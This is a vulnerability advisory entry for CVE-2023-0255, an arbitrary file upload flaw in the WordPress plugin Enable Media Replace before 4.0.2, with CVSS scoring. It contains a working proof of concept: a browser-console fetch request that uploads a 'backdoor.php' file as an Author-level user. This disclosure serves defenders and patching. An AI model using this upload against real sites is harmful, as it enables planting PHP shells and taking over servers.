Lucene search
Dc11WPEX-ID:B0239208-1E23-4774-9B8C-9611704A07A0HistoryJan 17, 2023 - 12:00 a.m.
Enable Media Replace < 4.0.2 - Author+ Arbitrary File Upload
2023-01-1700:00:00
dc11
221
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
0.001 Low
EPSS
Percentile
16.9%
The plugin does not prevent authors from uploading arbitrary files to the site, which may allow them to upload PHP shells on affected sites.
1) As an Author, upload a picture via http://vulnerable-site.tld/wp-admin/upload.php
2) Press on the new picture's thumbnail to see the attachment's details
3) Click on "Upload a new file", next to "Replace media"
4) Paste the following in your browser's developer console:
```
await fetch(document.forms[0].action, {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
"Content-Type": "multipart/form-data; boundary=---------------------------294159958331225347843177109147",
"Upgrade-Insecure-Requests": "1"
},
"body": `-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"ID\"\r\n\r\n${document.forms[0].action.match(/attachment_id=(\d+)/)[1]}\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"backdoor.php\"\r\nContent-Type: text/php\r\n\r\n<?php phpinfo();\n\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"remove_bg\"\r\n\r\nyes\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"replace_type\"\r\n\r\nreplace_and_search\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"timestamp_replace\"\r\n\r\n2\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_date\"\r\n\r\nJanuary 12, 2023\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_hour\"\r\n\r\n18\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_minute\"\r\n\r\n41\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"custom_date_formatted\"\r\n\r\n2023-01-12\r\n-----------------------------294159958331225347843177109147\r\nContent-Disposition: form-data; name=\"location_dir\"\r\n\r\n2023/01\r\n-----------------------------294159958331225347843177109147--\r\n`,
"method": "POST",
"mode": "cors"
});
```
5) Check the wp-content/uploads/2023/01 directory for the backdoor.php file.
Related
githubexploit
githubexploit
cve
cve
CVE-2023-0255
2023-02-13 15:15:21
wpvulndb
wpvulndb
Enable Media Replace < 4.0.2 - Author+ Arbitrary File Upload
2023-01-17 00:00:00
prion
prion
Design/Logic Flaw
2023-02-13 15:15:00
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
0.001 Low
EPSS
Percentile
16.9%
Related for WPEX-ID:B0239208-1E23-4774-9B8C-9611704A07A0